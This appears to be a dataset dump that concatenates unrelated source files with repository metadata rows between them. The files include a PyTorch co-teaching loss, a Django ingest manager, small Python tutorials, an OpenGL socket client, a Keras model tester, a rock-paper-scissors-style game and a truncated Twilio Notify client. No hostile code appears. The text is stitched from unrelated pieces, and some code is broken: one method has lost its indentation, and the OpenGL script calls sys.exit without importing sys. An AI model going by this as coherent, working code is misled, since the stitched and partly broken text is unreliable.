            total = total + errs[peer[:keep]].mean()
        return total
class MulCEInCoTeachingLoss(nn.Module):
    """Co-teaching cross-entropy over several classification head groups.

    The logits tensor x is split column-wise according to `group`; each
    unmasked head's CE is averaged over the easiest samples of a randomly
    shifted peer head.  The effective noise rate ramps linearly over
    `smooth_epoch` epochs (iter_per_epoch calls each).  When oe_scale is
    set, an outlier-exposure style penalty is added on the hardest samples.
    """
    def __init__(self, noise_rate=0.1, group=(2, 3, 3, 4), score_mode='pl_mean',
                 iter_per_epoch=100, smooth_epoch=0, oe_scale=None,
                 mask_group=None):
        super(MulCEInCoTeachingLoss, self).__init__()
        self.noise_rate = noise_rate
        self.group = group
        self.gsize = len(group)
        self.softmax = nn.Softmax(dim=1)
        self.score_mode = score_mode
        self.noise_rate_schedule = []
        # Linear warm-up of the noise rate, one entry per training iteration.
        for i in range(smooth_epoch):
            self.noise_rate_schedule += [self.noise_rate * i / smooth_epoch] * iter_per_epoch
        self.iter_count = 0
        self.oe_scale = oe_scale
        if mask_group is None:
            self.mask_group = [False] * len(self.group)
        else:
            self.mask_group = mask_group
    def get_noist_rate(self):
        """Return the scheduled noise rate and advance the iteration count.

        Stateful: each call consumes one schedule step, so this is tied to
        one call per forward().
        """
        if self.iter_count < len(self.noise_rate_schedule):
            ns = self.noise_rate_schedule[self.iter_count]
        else:
            ns = self.noise_rate
        self.iter_count += 1
        return ns
    def forward(self, x, labels):
        """x: concatenated logits; labels: one label tensor per group."""
        noise_rate = self.get_noist_rate()
        Lce = []
        now = 0
        idxsorted = []
        for i in range(len(self.group)):
            if not self.mask_group[i]:
                lce = F.cross_entropy(x[:, now: now+self.group[i]], labels[i], reduction='none')
                Lce.append(lce)
                idxsorted.append(lce.argsort().detach())
            now += self.group[i]
        #print(now)
        rem_num = int(x.size(0) * (1. - noise_rate))
        shift = random.randint(0, len(Lce) - 1)  # peer-head offset (may be 0)
        loss = 0
        for i in range(len(Lce)):
            loss += Lce[i][idxsorted[(i+shift)%len(Lce)][:rem_num]].mean()
            #loss += Lce[i].mean()
        if self.oe_scale is not None:
            # Penalty on the hardest oe_num samples: pushes their logits
            # towards a uniform distribution (mean-logit minus logsumexp).
            oe_num = -int(x.size(0) * noise_rate * self.oe_scale)
            now = 0
            for i in range(len(self.group)):
                if not self.mask_group[i]:
                    xi = x[idxsorted[(i + shift) % len(Lce)][oe_num:], now:now + self.group[i]]
                    loss += -0.1 * (xi.mean(dim=1) - torch.logsumexp(xi, dim=1)).mean()
                now += self.group[i]
        return loss
    def pl_mean(self, x, labels):
        """Per-sample score: sum of negative CE over the unmasked groups."""
        Lce = []
        now = 0
        #print(x.shape, labels[0].shape)
        for i in range(len(self.group)):
            if not self.mask_group[i]:
                lce = -F.cross_entropy(x[:, now: now + self.group[i]], labels[i], reduction='none')
                Lce.append(lce)
            now += self.group[i]
        loss = 0
        for i in range(len(Lce)):
            loss += Lce[i]
        return loss
    def neg_entropy(self, x):
        """Per-sample score: summed negative entropy over unmasked groups."""
        neg_entropy = 0
        now = 0
        for i in range(len(self.group)):
            if not self.mask_group[i]:
                ne = self.softmax(x[:, now: now+self.group[i]])
                ne = ne * torch.log2(ne)
                ne = ne.sum(dim=1)
                neg_entropy += ne
            now += self.group[i]
        return neg_entropy
def predict(self, x, labels):
if self.score_mode == 'pl_mean':
return self.pl_mean(x, labels)
else:
return self.neg_entropy(x) | [
"mpca"
] | mpca |
a0fb061548bfd69cb764cc4823ae29227aa804a6 | 0e8ab63a60fd03b1778aa392c0b11fedd88409e4 | /ingest/ingest/manager.py | 8ed7b3d707ce64b45eb7b82fa5323c3a84a15a39 | [] | no_license | Kyeongrok/dms | babeb19115355c3d930c94c89ca55d3e5de2dc55 | a67c446f0ffd3f9a1812de961ef915c405a4096f | refs/heads/master | 2021-06-23T22:44:18.881538 | 2019-09-26T03:42:13 | 2019-09-26T03:42:13 | 210,993,619 | 0 | 0 | null | 2021-03-25T22:57:32 | 2019-09-26T03:41:24 | Python | UTF-8 | Python | false | false | 2,747 | py | import abc
import logging
import os
from dmsclient.client import DMSClient
from dmsclient.exceptions import DMSClientException
from ingest import util
from ingest.logger import ElasticsearchHandler, JournalFormatter
class AbstractIngestManager(abc.ABC):
    """Base class for ingest managers: holds config, the DMS client, the
    optional Elasticsearch log handler, and validates the input path.
    Subclasses implement run().
    """
    def __init__(self, config, mount_path, reader_id, cartridge_id):
        self.log = logging.getLogger('ingest.manager')
        self.config = config
        self.thread_count = config['general']['threads']
        self.check_mountpoints = config['general']['check_mountpoints']
        self.ignore_directories = config['general']['ignore_directories']
        self.log_to_es = config['general']['log_to_es']
        self.mount_path = mount_path
        self.reader_id = reader_id
        self.cartridge_id = cartridge_id
        self.client = DMSClient(es_endpoint=config['elasticsearch']['endpoint'],
                                es_user=config['elasticsearch']['user'],
                                es_password=config['elasticsearch']['password'],
                                create_templates=config['elasticsearch']['create_templates'],
                                verify_templates=config['elasticsearch']['verify_templates'])
        if self.log_to_es:
            # Mirror all 'ingest' logging into Elasticsearch.
            handler = ElasticsearchHandler(self.client)
            formatter = JournalFormatter()
            handler.setFormatter(formatter)
            root_logger = logging.getLogger('ingest')
            root_logger.addHandler(handler)
        if not self.mount_path.startswith('rsync://'):
            # Local paths are normalised and checked for readability;
            # rsync:// URLs are taken as-is.
            try:
                self.mount_path = os.path.abspath(self.mount_path)
                self.__check_path(self.mount_path, readwrite=False)
            except Exception as e:
                self.log.error('Error checking the input path. {}'.format(str(e),))
                raise e
    def update_reader(self, message):
        """Publish a status message for this reader (no-op without reader_id)."""
        if self.reader_id:
            self.client.readers.set_message(self.reader_id, message)
    def set_cartridge_workflow_type(self, cartridge_id, workflow_type):
        """Set the workflow type of this manager's cartridge.

        NOTE(review): the 'cartridge_id' argument is ignored; the check and
        the call both use self.cartridge_id.  Confirm intent.
        """
        if self.cartridge_id:
            self.client.cartridges.set_workflow_type(self.cartridge_id, workflow_type)
    @abc.abstractmethod
    def run(self):
        # Subclasses implement the actual ingest loop.
        pass
    def __check_path(self, path, readwrite=False):
        """Raise if 'path' is not readable (or writable, when requested).

        rsync:// URLs are skipped entirely.
        """
        if path.startswith('rsync://'):
            return
        if readwrite:
            self.log.info("Checking write permissions on path '%s'" % (path,))
            if not util.isWritable(path):
                raise Exception('Cannot write to directory: %s' % (path,))
        else:
            self.log.info("Checking read permissions on path '%s'" % (path,))
            if not util.isReadable(path):
                raise Exception('Cannot read from directory: %s' % (path,))
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
1d3aa6d35106c3460d100c2156236cc0871312ec | fc5becca3e2e48a444b512e059df1cd21601829b | /Aulas/Aula19A.py | 4d8089077e3bdd14ae5f3b3b6ced29a4100d4556 | [
"MIT"
] | permissive | Felix-xilef/Curso-de-Python | c44bf8c22b393aefaed3a2bb3127ef7999e27fb8 | cdff7c7f3850e6326e274c8c1987b9e1a18ce910 | refs/heads/master | 2021-05-19T11:09:22.644638 | 2020-04-01T22:09:02 | 2020-04-01T22:09:02 | 251,665,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | # Dicionários {} / dict() - como uma lista, porém o indice pode ser definido (key)
# Dictionary demo: like a list, but with user-defined keys instead of indices.
pessoas = {'nome': 'Felix', 'sexo': 'm', 'idade': 18}
print(pessoas)
print(pessoas['nome'])   # access a value by its key
print(pessoas['idade'])
print(pessoas.values())  # view of all values
print(pessoas.keys())    # view of all keys
print(pessoas.items())   # view of (key, value) pairs
for k, v in pessoas.items():
    print(k, '=', v)
del pessoas['sexo']      # remove an entry by key
print(pessoas)
pessoas['nome'] = 'Gustavo'  # assigning to an existing key overwrites it
print(pessoas)
pessoas['peso'] = 74     # assigning to a new key creates the entry
print(pessoas)
input('\n\nPressione <enter> para continuar')
| [
"felixpb@yahoo.com.br"
] | felixpb@yahoo.com.br |
df89fe54c78053bec5a45d0838e0a6ff946f03f1 | bf7555ce71cb5ac6472a61fc9d229c2256ba6d10 | /board/views.py | ff8a125724037360f8fd26b63a9b2c08463b1cf7 | [] | no_license | vivideljo/my-first-board | 29b29226fe213e5f2fd9c658733a1a7701f057ff | d8c78ba9c7162bc9c2a12cef725c9ea856a049aa | refs/heads/master | 2020-04-04T10:05:01.083793 | 2018-11-02T09:56:29 | 2018-11-02T09:56:29 | 155,842,234 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | from django.shortcuts import render
# Create your views here.
def post_list(request):
    """Render the board's post-list template (empty context for now)."""
    return render(request, 'board/post_list.html', {})
| [
"vivideljo@gmail.com"
] | vivideljo@gmail.com |
c4b90c1495df475c554108312c8e2a94b88ee10d | ef66e297a49d04098d98a711ca3fda7b8a9a657c | /Python/display.py | 1b280e0ad29c46c1e08530191b08e20ef0df52eb | [] | no_license | breezy1812/MyCodes | 34940357954dad35ddcf39aa6c9bc9e5cd1748eb | 9e3d117d17025b3b587c5a80638cb8b3de754195 | refs/heads/master | 2020-07-19T13:36:05.270908 | 2018-12-15T08:54:30 | 2018-12-15T08:54:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,897 | py | # coding: UTF-8
__metaclass__ = type
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import random
import socket
# Module-level state shared by the GLUT callbacks below.
i = 0              # NOTE(review): appears unused in this module
winId = 0          # GLUT window id, set in main()
s = None           # client socket to the position server, set in main()
poses = []         # latest batch of [x, y, flag] points filled by Update()
SIZE = [800, 600]  # window width/height in pixels
clear = True       # when True, Draw() clears the frame buffer once
def Draw():
    """GLUT display callback: plot the buffered points as 5px smooth dots.

    Items in 'poses' are [x, y, flag] with coordinates already mapped into
    GL's [-1, 1] range by Update(); flag == 1 draws the point, flag == -1
    schedules a screen clear for the next frame.  Consumes (empties) the
    'poses' buffer.
    """
    global poses
    global clear
    glEnable(GL_POINT_SMOOTH)
    if clear:
        glClear(GL_COLOR_BUFFER_BIT)
        clear = False
    glPointSize(5)
    glBegin(GL_POINTS)
    for item in poses:
        try:
            if item[2] == 1:
                glVertex2f(item[0], item[1])
            elif item[2] == -1:
                clear = True
        except:
            # Malformed items (too few fields) are silently skipped.
            pass
    poses = []
    glEnd()
    glFlush()
def Update():
    """GLUT idle callback (Python 2): receive points and trigger a redraw.

    Reads up to 4096 bytes of 'x,y,flag|x,y,flag|...' text from the socket,
    parses the triples into ints, rescales pixel coordinates into GL's
    [-1, 1] range (y inverted), then schedules a repaint.  On any error the
    socket is closed and the process exits.

    NOTE(review): 'sys' is never imported in this module, so sys.exit(0)
    would itself raise NameError if this handler runs — confirm against
    the full file.
    """
    global s
    global poses
    try:
        data = s.recv(4096).split('|')
        poses = map(lambda x: map(lambda y: int(y), x.split(',')), data)
        if not data:
            raise Exception
    except Exception, e:
        print e
        s.close()
        sys.exit(0)
    for item in poses:
        # Map pixel coordinates to [-1, 1]; flip y so up is positive.
        item[0] = (item[0]*1.0/SIZE[0]*200-100)/100.0
        item[1] = -((item[1]*1.0/SIZE[1]*200-100))/100.0
    print poses
    glutPostRedisplay()
def keyboardHit(key, mouseX, mouseY):
    """Quit on 'q': destroy the window and close the socket.

    NOTE(review): 'sys' is never imported in this module, so sys.exit()
    would raise NameError if reached — confirm against the full file.
    """
    if key == 'q':
        global s
        glutDestroyWindow(winId)
        s.close()
        sys.exit()
def mouseHit(button, state, mouseX, mouseY):
    # No-op placeholder registered with GLUT.
    pass
def mouseMotion(mouseX, mouseY):
    # No-op placeholder registered with GLUT.
    pass
def main():
    """Connect to the position server on this host and run the GLUT loop."""
    global winId
    global s
    s = socket.socket()
    host = socket.gethostname()
    s.connect((host, 1234))  # position server on the local machine
    glutInit()
    glutInitDisplayMode(GLUT_SINGLE | GLUT_RGBA)
    glutInitWindowSize(SIZE[0], SIZE[1])
    winId = glutCreateWindow("David")
    # Register the callbacks defined above, then block in the event loop.
    glutDisplayFunc(Draw)
    glutIdleFunc(Update)
    glutKeyboardFunc(keyboardHit)
    glutMouseFunc(mouseHit)
    glutMotionFunc(mouseMotion)
    glutMainLoop()
if __name__ == '__main__':
    try:
        main()
    except Exception, e:
        print e
| [
"youchen.du@gmail.com"
] | youchen.du@gmail.com |
83e2c01818bddb7fae6580e5e2ebc1b0d46fe323 | 13f49f029dcac3ae64021e6e97964824116e33b9 | /manage.py | 93193becb0cf9874da6917f77aca71762680df1f | [] | no_license | bds511/DjangoGirls_Blog | 3bd1fe69d12a52367f7181ab98e57f154466a3f9 | 3630405ada79fba5d499abb7676ca1dfde61169e | refs/heads/master | 2020-07-25T20:00:24.989622 | 2019-09-14T08:09:04 | 2019-09-14T08:09:04 | 208,409,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 628 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run Django administrative tasks for the 'djangogo' project."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangogo.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| [
"pypy7000@korea.ac.kr"
] | pypy7000@korea.ac.kr |
9be123668b9ef5ff48a363b8a30c21ac7e1c161c | 1cedbf7e752a0eb11e141b1fc6fb29c3752657d3 | /CH05A-BK_Bot_Web_App.py | dd44bd0a59bb7f8f5d00b5a7c46f934092ee4884 | [] | no_license | fabricerjsjoseph/CH05-Byron-Katie-Bot-4-on-Flask | 260ae633d63aec2b630ccb199b21b86e71c4777b | 0e7cd8b07004dd3931296daba04b32e343ac91b6 | refs/heads/master | 2022-04-11T11:52:19.259889 | 2020-02-16T08:00:51 | 2020-02-16T08:00:51 | 236,722,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,727 | py |
# import open source modules
import glob
import re
# import private modules
from Turnaround_One import turnaround_one_generator
from Turnaround_Two import turnaround_two_generator
from Turnaround_Three import turnaround_three_generator
# UNPACKING DATA STORED IN TEXT FILES
# Import all text files in working directory
txt_list=glob.glob(r"Txt/*.txt")
# Initialise empty to store data from text files
master_list=[]
# Read each text file and store data in master_list
# (one sub-list per file, trailing newlines stripped from every line)
for txt in txt_list:
    with open(txt,'r',encoding='utf-8') as f:
        data=f.readlines()
        data=[re.sub('\n','',item) for item in data]
        master_list.append(data)
# Store all BOT generated statements such as greetings in list
# NOTE(review): glob ordering is filesystem-dependent; the fixed indices
# below assume the four files come back in a specific order - confirm.
statements_list=master_list[0]
# Store all questions in list
four_questions_list=master_list[1]
# Store all guidelines to questions in list
four_questions_guidance_list=master_list[2]
# Store all turnaround questions & related messages
turnarounds_list=master_list[3]
# Initialise list to store user inputs
user_message_log=[]
# Initialise list to store chatbot responses
all_bot_responses_list=[]
def gen_all_bot_responses(first_message):
    """Pre-compute the whole scripted conversation from the user's first
    message and append it to the module-level all_bot_responses_list.

    Sequence: the four questions, three turnaround statements, three
    generated turnarounds, then the closing statement.  Returns the list.
    """
    # Generate the 4 questions based on the user's 1st message
    for question_no in range(4):
        response='LUCY: ' + four_questions_list[question_no]+' {}?'.format(first_message)
        all_bot_responses_list.append(response)
    # Display the 3 statements of the turnaround sections
    tr_statement_1='LUCY: '+ turnarounds_list[0]+' {}'.format(first_message)+'... type OK to continue.'
    tr_statement_2='LUCY: '+ turnarounds_list[1]+' type OK to continue.'
    tr_statement_3='LUCY: '+ turnarounds_list[2]+'.. type OK to continue.'
    all_bot_responses_list.extend([tr_statement_1,tr_statement_2,tr_statement_3])
    # Generate the three turnaround questions based on the user's 1st message
    turnaround_one='LUCY: ' + turnarounds_list[3]+' {}'.format(turnaround_one_generator(first_message))
    turnaround_two='LUCY: ' + turnarounds_list[4]+' {}'.format(turnaround_two_generator(first_message))
    turnaround_three='LUCY: ' + turnarounds_list[5]+' {}'.format(turnaround_three_generator(first_message))
    all_bot_responses_list.extend([turnaround_one,turnaround_two,turnaround_three])
    # Add Closing Statement
    closing_statement=statements_list[1]+' {}'.format(first_message)
    all_bot_responses_list.append(closing_statement)
    return all_bot_responses_list
def bot_response(user_message):
    """Return the next scripted bot reply for the given user message.

    The first message seeds the whole conversation via
    gen_all_bot_responses(); subsequent calls simply return the response
    at position (message count - 1).  Relies on module-level state, so
    there is one conversation per process.
    """
    # Add user's message to list
    user_message_log.append(user_message)
    # Calculate no of user messages stored in list
    no_messages=len(user_message_log)
    # Only run bot_response function once
    if no_messages==1:
        # Generate all bot reponses based on 1st user message
        gen_all_bot_responses(user_message_log[0])
    # Add bot message to conversation list
    response= all_bot_responses_list[no_messages-1]
    return response
from flask import Flask, render_template, request
# Create the App Object
app = Flask(__name__)
# Change Flask environment from Production to Development
#get_ipython().run_line_magic('env', 'FLASK_ENV=development')
@app.route("/")
def home():
    # Serve the chat UI page.
    return render_template("home.html")
@app.route("/get")
def get_bot_response():
    # AJAX endpoint: ?msg=<user text> -> next scripted bot reply as text.
    user_message = request.args.get('msg')
    return str(bot_response(user_message))
# import webbrowser module
import webbrowser
# Register webbrowser
chrome_path="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
webbrowser.register('chrome', None,webbrowser.BackgroundBrowser(chrome_path))
if __name__ == "__main__":
    # Open the app in Chrome, then start the development server.
    webbrowser.get('chrome').open_new('http://127.0.0.1:5000/')
    app.run(debug=False)
| [
"60127514+fabricerjsjoseph@users.noreply.github.com"
] | 60127514+fabricerjsjoseph@users.noreply.github.com |
e57f6351bc13444d18ec9ae6b667d6e3d4b37ed4 | a7e75fcd05aa8ebf2066c4eb0a05496042dd5ded | /better_work_data/better_work_data/items.py | ab7aeb32e62a563ca44dce609a18c2de91fd0b79 | [
"MIT"
] | permissive | JackDan9/miniProgram | d6fe14fced0f9a154d01a6f950ab26325ed445de | d60a33275334b4caa3c15d5c6196938fb800505b | refs/heads/master | 2023-02-10T13:26:23.453536 | 2023-01-09T03:41:43 | 2023-01-09T03:41:43 | 132,235,452 | 1 | 0 | MIT | 2023-02-08T00:42:41 | 2018-05-05T09:55:32 | JavaScript | UTF-8 | Python | false | false | 515 | py | # Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class BetterWorkDataItem(scrapy.Item):
    """Item produced by the better_work_data spiders.

    Each attribute is a scrapy.Field container; values are filled in by
    the spiders and post-processed by the item pipelines.
    """
    # Redundant scaffold comments and the trailing 'pass' statement from
    # the scrapy template were removed; the field set is unchanged.
    order = scrapy.Field()
    title = scrapy.Field()
    summary = scrapy.Field()
    source_type = scrapy.Field()
    source_name = scrapy.Field()
    publish_on = scrapy.Field()
    created_on = scrapy.Field()
    updated_on = scrapy.Field()
| [
"1835812864@qq.com"
] | 1835812864@qq.com |
26761316ecfc0c6a20c536f8657d987f843af9c0 | 4714723a2ac6b230640a766c3f786e8b5cad6c6e | /static_test_model.py | 93383a676ba15c66a05beba0580e0f34e0a1b251 | [] | no_license | Deeathex/RealTimeSignLanguageRecognition | 622ff1b2a78496b1b73bba68aeec4f3528e07795 | c131741f006b4d6154341a64a1777e8989a375c0 | refs/heads/master | 2020-06-06T05:25:43.382716 | 2019-07-04T15:06:36 | 2019-07-04T15:06:36 | 192,610,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,374 | py | from tensorflow.python.keras.models import load_model
import numpy as np
import os
from tensorflow.python.keras.preprocessing import image
import constants as constant
import utils
class StaticTestModel:
    """Evaluate a saved Keras sign-language classifier on a labelled test set.

    The test set is expected under ``constant.TEST_DATA_DIRECTORY`` with one
    sub-directory per class label (letter), each containing image files of
    that letter.
    """

    def __init__(self, model_filename):
        # Models are stored in the shared metrics directory.
        self.model_filename = model_filename
        self.classifier = load_model(constant.MODEL_METRICS_DIRECTORY + model_filename)

    def predict(self, image_path):
        """Return the predicted character for the image at *image_path*."""
        test_image = image.load_img(image_path, grayscale=True)
        test_image = image.img_to_array(test_image)
        # The model expects a leading batch dimension.
        test_image = np.expand_dims(test_image, axis=0)
        result = self.classifier.predict(test_image)
        current_result = utils.get_letter_based_on_prediction(result)
        return utils.get_correct_character_for_special_characters(current_result)

    def test_model_with_alphabet(self, images_format='.JPG'):
        """Predict every test image; print per-letter and global accuracy.

        *images_format* is kept for backward compatibility and is unused.
        """
        global_correct_classification_count = 0
        global_total_examples_count = 0
        for subdir, dirs, files in os.walk(constant.TEST_DATA_DIRECTORY):
            if not files:
                # Skip the root directory and empty letter directories.
                # Previously execution fell through to the accuracy division
                # below with total_examples_count == 0 -> ZeroDivisionError.
                continue
            split_list = subdir.split('TestData/')
            actual_letter = split_list[1]
            print(actual_letter)
            correct_classification_count = 0
            total_examples_count = 0
            for file in files:
                image_path = os.path.join(subdir, file)
                predicted_letter = self.predict(image_path)
                total_examples_count += 1
                if actual_letter == predicted_letter:
                    correct_classification_count += 1
            print('Correctly classified: ' + str(correct_classification_count))
            acc = correct_classification_count / total_examples_count
            global_correct_classification_count += correct_classification_count
            global_total_examples_count += total_examples_count
            print('Accuracy: ' + str(acc))
        print('Global correctly classified: ' + str(global_correct_classification_count) + "/" + str(
            global_total_examples_count))
        if global_total_examples_count:
            global_acc = global_correct_classification_count / global_total_examples_count
            print('Global accuracy: ' + str(global_acc))
        else:
            # No images found at all -- report instead of dividing by zero.
            print('Global accuracy: n/a (no test images found)')
# test_model_A = StaticTestModel('model_saved_2019-06-18.h5')
# Load the most recent trained model and run the full evaluation when the
# module is executed/imported.
test_model = StaticTestModel('model_saved_2019-06-20.h5')
test_model.test_model_with_alphabet()
| [
"andreea_ciforac@yahoo.com"
] | andreea_ciforac@yahoo.com |
fdda2d1b337921b8f011f818239c1ab267043919 | 3d9586a7f5891c11cd18c96d0a1a86f7aad2ae50 | /snake_water_gun_game.py | 221a45b2a2083b340bb247029e32348d55258141 | [] | no_license | Raitry333/CodeWithHarry | cb77d99ed87b0be59e736c0b86e515940985a70a | f95d704f3bd99894dd8c97776e03b7df0552d6cb | refs/heads/main | 2023-06-06T01:35:49.250155 | 2021-06-21T14:50:13 | 2021-06-21T14:50:13 | 378,957,162 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,564 | py | import random
lst=["s","g","w"]
print("WELCOME TO MY GAME!!!!")
print("CHOOSE 'S' FOR SNAKE")
print("CHOOSE 'g' FOR GUN")
print("CHOOSE 'w' FOR WATER")
i=1
your_point=0
comp_point=0
while(i<11):
inp=input("WHAT'S YOUR CHOICE?\n")
chc=random.choice(lst)
print(chc)
if(inp=="s" and chc=="w"):
print("WIN!!!!")
your_point=your_point+1
i=i+1
elif(inp=="w" and chc=="s"):
print("LOSE:(")
comp_point=comp_point+1
i=i+1
elif(inp=="w" and chc=="g"):
print("WIN!!!!")
your_point=your_point+1
i=i+1
elif(inp=="g" and chc=="w"):
print("LOSE:(")
comp_point=comp_point+1
i=i+1
elif(inp=="g" and chc=="s"):
print("WIN!!!!")
your_point=your_point+1
i=i+1
elif(inp=="s" and chc=="g"):
print("LOSE:(")
comp_point=comp_point+1
i=i+1
elif(inp=="s" and chc=="s"):
print("TIE")
i=i+1
elif(inp=="w" and chc=="w"):
print("TIE")
i=i+1
elif(inp=="g" and chc=="g"):
print("TIE")
i=i+1
if(i>=11):
print("GAME OVER!!!")
if(your_point>comp_point):
print("YOU'RE THE WINNER!\n YOUR POINT IS\n",your_point)
print("COMPUTER'S POINT IS\n",comp_point)
if(your_point<comp_point):
print("YOU LOSE!:(\n YOUR POINT IS\n",your_point)
print("COMPUTER'S POINT IS\n",comp_point)
if(your_point==comp_point):
print("IT'S A TIE!")
print("YOUR POINT IS\n",your_point)
print("COMPUTER'S POINT IS\n",comp_point)
| [
"noreply@github.com"
] | Raitry333.noreply@github.com |
00d46f6208f8351c6481c11aeca380df258cd34e | 3c0526e87e9ea80ef2676058f3023e9111d0eab9 | /twilio/rest/notify/v1/service/notification.py | c9a3ffe4539915cad8672dba9f4c79913168e87c | [] | no_license | smgood/cryptobot | f24ef69b9b253b9e421bf5bbef3b750fcc1a7332 | 13448eb8dfc34fedaba4d10ce642c38fe80a3526 | refs/heads/master | 2020-07-21T15:36:55.353596 | 2019-09-07T03:37:56 | 2019-09-07T03:37:56 | 206,910,383 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,909 | py | # coding=utf-8
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class NotificationList(ListResource):
    """ PLEASE NOTE that this class contains beta products that are subject to
    change. Use them with caution.

    List resource for Twilio Notify notifications under one Service:
    builds the /Services/{sid}/Notifications URI and creates notifications.
    """

    def __init__(self, version, service_sid):
        """
        Initialize the NotificationList

        :param Version version: Version that contains the resource
        :param service_sid: The service_sid

        :returns: twilio.rest.notify.v1.service.notification.NotificationList
        :rtype: twilio.rest.notify.v1.service.notification.NotificationList
        """
        super(NotificationList, self).__init__(version)

        # Path Solution
        self._solution = {'service_sid': service_sid, }
        self._uri = '/Services/{service_sid}/Notifications'.format(**self._solution)

    def create(self, body=values.unset, priority=values.unset, ttl=values.unset,
               title=values.unset, sound=values.unset, action=values.unset,
               data=values.unset, apn=values.unset, gcm=values.unset,
               sms=values.unset, facebook_messenger=values.unset, fcm=values.unset,
               segment=values.unset, alexa=values.unset, to_binding=values.unset,
               identity=values.unset, tag=values.unset):
        """
        Create a new NotificationInstance

        :param unicode body: Indicates the notification body text.
        :param NotificationInstance.Priority priority: Two priorities defined: low and high.
        :param unicode ttl: This parameter specifies how long the notification is valid.
        :param unicode title: Indicates the notification title.
        :param unicode sound: Indicates a sound to be played.
        :param unicode action: Specifies the actions to be displayed for the notification.
        :param dict data: This parameter specifies the custom key-value pairs of the notification’s payload.
        :param dict apn: APNS specific payload that overrides corresponding attributes in a generic payload for Bindings with the apn BindingType.
        :param dict gcm: GCM specific payload that overrides corresponding attributes in generic payload for Bindings with gcm BindingType.
        :param dict sms: SMS specific payload that overrides corresponding attributes in generic payload for Bindings with sms BindingType.
        :param dict facebook_messenger: Messenger specific payload that overrides corresponding attributes in generic payload for Bindings with facebook-messenger BindingType.
        :param dict fcm: FCM specific payload that overrides corresponding attributes in generic payload for Bindings with fcm BindingType.
        :param unicode segment: The segment
        :param dict alexa: The alexa
        :param unicode to_binding: The destination address in a JSON object.
        :param unicode identity: Delivery will be attempted only to Bindings with an Identity in this list.
        :param unicode tag: Delivery will be attempted only to Bindings that have all of the Tags in this list.

        :returns: Newly created NotificationInstance
        :rtype: twilio.rest.notify.v1.service.notification.NotificationInstance
        """
        # NOTE: the dict literal below is evaluated before the name ``data``
        # is rebound, so 'Data' still serializes the *data* parameter.
        data = values.of({
            'Identity': serialize.map(identity, lambda e: e),
            'Tag': serialize.map(tag, lambda e: e),
            'Body': body,
            'Priority': priority,
            'Ttl': ttl,
            'Title': title,
            'Sound': sound,
            'Action': action,
            'Data': serialize.object(data),
            'Apn': serialize.object(apn),
            'Gcm': serialize.object(gcm),
            'Sms': serialize.object(sms),
            'FacebookMessenger': serialize.object(facebook_messenger),
            'Fcm': serialize.object(fcm),
            'Segment': serialize.map(segment, lambda e: e),
            'Alexa': serialize.object(alexa),
            'ToBinding': serialize.map(to_binding, lambda e: e),
        })

        payload = self._version.create(
            'POST',
            self._uri,
            data=data,
        )

        return NotificationInstance(self._version, payload, service_sid=self._solution['service_sid'], )

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Notify.V1.NotificationList>'
class NotificationPage(Page):
    """ PLEASE NOTE that this class contains beta products that are subject to
    change. Use them with caution.

    One page of Notification API results; wraps each raw payload record in a
    NotificationInstance.
    """

    def __init__(self, version, response, solution):
        """
        Initialize the NotificationPage

        :param Version version: Version that contains the resource
        :param Response response: Response from the API
        :param service_sid: The service_sid

        :returns: twilio.rest.notify.v1.service.notification.NotificationPage
        :rtype: twilio.rest.notify.v1.service.notification.NotificationPage
        """
        super(NotificationPage, self).__init__(version, response)

        # Path Solution
        self._solution = solution

    def get_instance(self, payload):
        """
        Build an instance of NotificationInstance

        :param dict payload: Payload response from the API

        :returns: twilio.rest.notify.v1.service.notification.NotificationInstance
        :rtype: twilio.rest.notify.v1.service.notification.NotificationInstance
        """
        return NotificationInstance(self._version, payload, service_sid=self._solution['service_sid'], )

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Notify.V1.NotificationPage>'
class NotificationInstance(InstanceResource):
    """ PLEASE NOTE that this class contains beta products that are subject to
    change. Use them with caution.

    Read-only view over one Notification API payload; every field is exposed
    as a property backed by the marshaled ``_properties`` dict.
    """

    class Priority(object):
        # Allowed values for the ``priority`` field.
        HIGH = "high"
        LOW = "low"

    def __init__(self, version, payload, service_sid):
        """
        Initialize the NotificationInstance

        :returns: twilio.rest.notify.v1.service.notification.NotificationInstance
        :rtype: twilio.rest.notify.v1.service.notification.NotificationInstance
        """
        super(NotificationInstance, self).__init__(version)

        # Marshaled Properties
        # NOTE(review): direct indexing raises KeyError if the API response
        # omits any of these fields.
        self._properties = {
            'sid': payload['sid'],
            'account_sid': payload['account_sid'],
            'service_sid': payload['service_sid'],
            'date_created': deserialize.iso8601_datetime(payload['date_created']),
            'identities': payload['identities'],
            'tags': payload['tags'],
            'segments': payload['segments'],
            'priority': payload['priority'],
            'ttl': deserialize.integer(payload['ttl']),
            'title': payload['title'],
            'body': payload['body'],
            'sound': payload['sound'],
            'action': payload['action'],
            'data': payload['data'],
            'apn': payload['apn'],
